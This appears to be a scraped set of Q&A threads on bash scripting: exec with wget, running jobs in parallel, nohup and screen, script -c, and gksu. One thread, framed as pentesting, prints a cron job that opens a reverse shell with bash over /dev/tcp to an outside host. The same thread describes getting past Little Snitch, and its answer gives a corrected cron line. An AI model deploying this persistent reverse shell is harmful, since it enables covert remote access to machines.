Running exec on wget commands in a file from bash script ignores wget options - bash

If I run this shell script, I get exec causing wget to act goofy.
echo "wget http://www.google.com/ -O - >> output.html" > /tmp/mytext
while read line
do
exec $line
done < /tmp/mytext
It acts like wget is operating on three different urls
wget http://www.google.com/ -O -
wget >>
wget output.html
The first command spits the output to STDOUT and the next two wget commands fail as they are nonsense.
How do I get exec to work properly?
I'm using exec instead of simply calling bash on the file because if I use exec on a large list of wget calls I get more than one wget process spawned. Simply calling bash on a file with a large list of urls is slow as it waits for one wget operation to complete before moving onto the next one.
Versions:
GNU Wget 1.15 built on linux-gnu.
GNU bash, version 4.3.0(1)-release (i686-pc-linux-gnu)

I'm using exec instead of simply calling bash on the file because if I
use exec on a large list of wget calls I get more than one wget
process spawned.
No. When exec is called, it does not spawn a new process. It replaces the existing process. See man bash for details.
Simply calling bash on a file with a large list of urls is slow as it
waits for one wget operation to complete before moving onto the next
one.
True. Fortunately, there is a solution. To run a lot of processes in parallel, run them in the background. For example, to run many wget processes in parallel, use:
while read url
do
wget "$url" -O - >> output.html &
done <list_of_urls
The ampersand at the end of the line causes that that command to run in the background in parallel with everything else. The above code will start new wget processes as fast as it can. Those processes will continue until they complete.
You can experiment with this idea very simply at the command prompt. Run
sleep 10s
and your command prompt will disappear for 10 seconds. However, run:
sleep 10s &
and your command prompt will return immediately while sleep runs in the background.
man bash explains:
If a command is terminated by the control operator &,
the shell executes the command in the background in a
subshell. The shell does not wait for the command to
finish, and the return status is 0.

I think, you can use
exec $(cat /tmp/mytext)

Related

Bash script to run a detached loop that sequentially starts backgound processes

I am trying to run a series of tests on a remote Linux server to which I am connecting via ssh.
I don't want to have to stay logged in the ssh session during the runs -> nohup(?)
I don't want to have to keep checking if one run is done -> for loop(?)
Because of licensing issues, I can only run a single testing process at a time -> sequential
I want to keep working while the test set is being processed -> background
Here's what I tried:
#!/usr/bin/env bash
# Assembling a list of commands to be executed sequentially
TESTRUNS="";
for i in `ls ../testSet/*`;
do
MSG="running test problem ${i##*/}";
RUN="mySequentialCommand $i > results/${i##*/} 2> /dev/null;";
TESTRUNS=$TESTRUNS"echo $MSG; $RUN";
done
#run commands with nohup to be able to log out of ssh session
nohup eval $TESTRUNS &
But it looks like nohup doesn't fare too well with eval.
Any thoughts?
nohup is needed if you want your scripts to run even after the shell is closed. so yes.
and the & is not necessary in RUN since you execute the command with &.
Now your script builds the command in the for loop, but doesn't execute it. It means you'll have only the last file running. If you want to run all of the files, you need to execute the nohup command as part of your loop. BUT - you can't run the commands with & because this will run commands in the background and return to the script, which will execute the next item in the loop. Eventually this would run all files in parallel.
Move the nohup eval $TESTRUNS inside the for loop, but again, you can't run it with &. What you need to do is run the script itself with nohup, and the script will loop through all files one at a time, in the background, even after the shell is closed.
You could take a look at screen, an alternative for nohup with additional features. I will replace your testscript with while [ 1 ]; do printf "."; sleep 5; done for testing the screen solution.
The commands screen -ls are optional, just showing what is going on.
prompt> screen -ls
No Sockets found in /var/run/uscreens/S-notroot.
prompt> screen
prompt> screen -ls
prompt> while [ 1 ]; do printf "."; sleep 5; done
# You don't get a prompt. Use "CTRL-a d" to detach from your current screen
prompt> screen -ls
# do some work
# connect to screen with batch running
prompt> screen -r
# Press ^C to terminate the batch (script printing dots)
prompt> screen -ls
prompt> exit
prompt> screen -ls
Google for screenrc to see how you can customize the interface.
You can change your script into something like
#!/usr/bin/env bash
# Assembling a list of commands to be executed sequentially
for i in ../testSet/*; do
do
echo "Running test problem ${i##*/}"
mySequentialCommand $i > results/${i##*/} 2> /dev/null
done
Above script can be started with nohup scriptname & when you do not use screen or simple scriptname inside the screen.

How to run "script -a xxx.txt" properly in a shell script?

I have a shell script and I want the session text to be saved automatically every time the script runs, so I included the command "script -a output.txt" at the beginning of my script. However, the script stops running after this line of code, which only displays a "bash-3.2$" on the screen and won't go on. Any ideas?
Thanks in advance!
The problem is script starts a separate sub-shell than the one that is running the actual script, to club them together. Use the -c flag in script
-c, --command command
Run the command rather than an interactive shell. This makes
it easy for a script to capture the output of a program that
behaves differently when its stdout is not a tty.
Just do,
script -c 'bash yourScript.sh' -a output.txt

OS X: cron job invokes bash but process run is 'sh'

I'm working on a pentesting project in which I want to open a reverse shell. I have a device that can trigger Little Snitch and then set it to allow outbound connections for certain processes. It does this by issuing a reverse shell command and, when the LS window pops up, acts as a keyboard to tell LS to always allow this type of connection. I can successfully do this for Bash, Perl, Python and Curl. The device also installs a cron job which contains a one-line reverse shell using bash.
But here's the problem...
The first time the cron job runs, Little Snitch still gets triggered because it has seen an outbound connection from 'sh' - not 'bash'. Yet the command definitely calls bash. The cron job is:
*/5 * * * * /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &
Subsequent connections are either from bash or sh - I haven't yet detected a pattern.
I've tried triggering LS in the original setup by using /bin/sh, but at that stage it still gets interpreted (ie, is seen by LS) as bash, not sh (as, in OS X, they as essentially the same thing but with slightly different behaviours depending on how invoked).
Any thoughts about how I can stop OS X using sh rather than bash in the cron job. Or, alternatively, how I can invoke sh rather than bash? (Like I said, /bin/sh doesn't do it!).
The command string is /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &. Cron needs to invoke this command. It doesn't parse the command string itself to learn that the first "word" is /bin/bash and then execute /bin/bash, passing it the rest of the arguments. (Among other things, not all parts of the command are arguments.)
Instead, it invokes /bin/sh with a first argument of -c and the second argument being your command string. That's just the generic way to run a command string.
Then, /bin/sh interprets the command string. Part of the command is redirection. This is not done by the program that the command launches. It is done by the shell which will launch that program. That is, the instance of /bin/sh has to set up the file descriptors for the child process it's going to launch prior to launching that child process.
So, /bin/sh opens /dev/tcp/connect.blogsite.org/1337. It then passes the file descriptor to the child process it launches as descriptors 0 and 1. (It could do this using fork() and dup2() before execve() or it could do it all using posix_spawn() with appropriate file actions.)
The ultimate /bin/bash process doesn't open its own input or output. It just inherits them and, presumably, goes on to use them.
You could fix this by using yet another level of indirection in your command string. Basically, invoke /bin/bash with -c and its own command string. Like so:
*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &'
So, the initial instance of /bin/sh won't open the file. It will simply spawn an instance of /bin/bash with arguments -c and the command string. That first instance of /bin/bash will interpret the command string, open the file in order to carry out the redirection directives, and then spawn a second instance of /bin/bash which will inherit those file descriptors.

Execute one command after another one finishes under gksu

I'm trying to have a desktop shortcut that executes one command (without a script, I'm just wondering if that is possible). That command requires root privileges so I use gksu in Ubuntu, after I finish typing my password and it is correct I want the other command to run a file. I have this command:
xterm -e "gksu cp /opt/Popcorn-Time/backup/* /opt/Popcorn-Time; /opt/Popcorn-Time/Popcorn-Time"
But Popcorn-Time opens without it waiting for me to finish typing my password (correctly). I want to do this without a seperate script, if possible.
How should I do this?
EDIT: Ah! I see what is going on now, you've all been helping me with causing Popcorn-Time to wait for gksu to finish, but Popcorn-Time isn't going to run without the files in backup, and those are a bit heavy (7 MB total), so it takes a second for them to complete the transfer, then Popcorn-Time is already open by the time the files are copied. Is there a way to wait for Popcorn-Time to wait for the cp command to finish?
I also changed my command above to what I have now.
EDIT #2: Everything I said by now isn't relevant, as the problem with Popcorn-Time isn't what I thought, I didn't need to copy the files over, I just needed to run it as root for it to work. Thanks for everyone who tried to help.
Thanks.
If you want the /opt/popcorntime/Popcorn-time command to wait until the first command finishes, you can separate the commands by && so that the second only executes on successful completion of the first. This is called a compound-command. E.g.:
command1 && command2
With gksu in order to run multiple commands with only a single password entry, you will need:
gksu -- bash -c 'command1 && command2'
In your case:
gnome-terminal -e gksu -- bash -c "cp /opt/popcorntime/backup/* /opt/popcorntime && /opt/popcorntime/Popcorn-Time"
(you may have to adjust quoting to fit your expansion needs)
You can use the or operator in a similar fashion so that the second command only executes if the first fails. E.g.:
command1 || command2
In a console you would do:
gksu cp /opt/popcorntime/backup/* /opt/popcorntime; /opt/popcorntime/Popcorn-Time
In order to use it as Exec in the .desktop file wrap it like this:
bash -e "gksu cp /opt/popcorntime/backup/* /opt/popcorntime; /opt/popcorntime/Popcorn-Time"
The problem is that gnome-terminal is only seeing the gksu command as the value to the -e argument and not the Popcorn-Time command.
gnome-terminal forks and returns immediately and so Popcorn-Time runs immediately.
The solution is to quote the entire command string (both commands) so they are (combined) the single argument to -e.

Running processes simultaneously, Bash

I would like to run n processes (in my case simulations) simultaneously, using bash.
Right now this is what I'm running:
for file in $ini/SAN*.ini;
do
echo "Running $file...";
temp=$(basename $file .ini)
mosrun -G opp_run -r 0 -u Cmdenv -n ..:../../src -l ../../src/inet SAN.ini > $outputs/$temp.out;
done
Problem is, the loop only progresses to the next iteration after the simulation is done. Any suggestions? Thanks!
You should be able to run your command in the background by adding a & after it.
Should make them run in parallell, although in the background.
(Small side note: the processes will continue to run even if you abort the script, so you might want to add a trap to kill the processes if you hit for eg. ctrl-c when script is running. Look at bash manual.)

Resources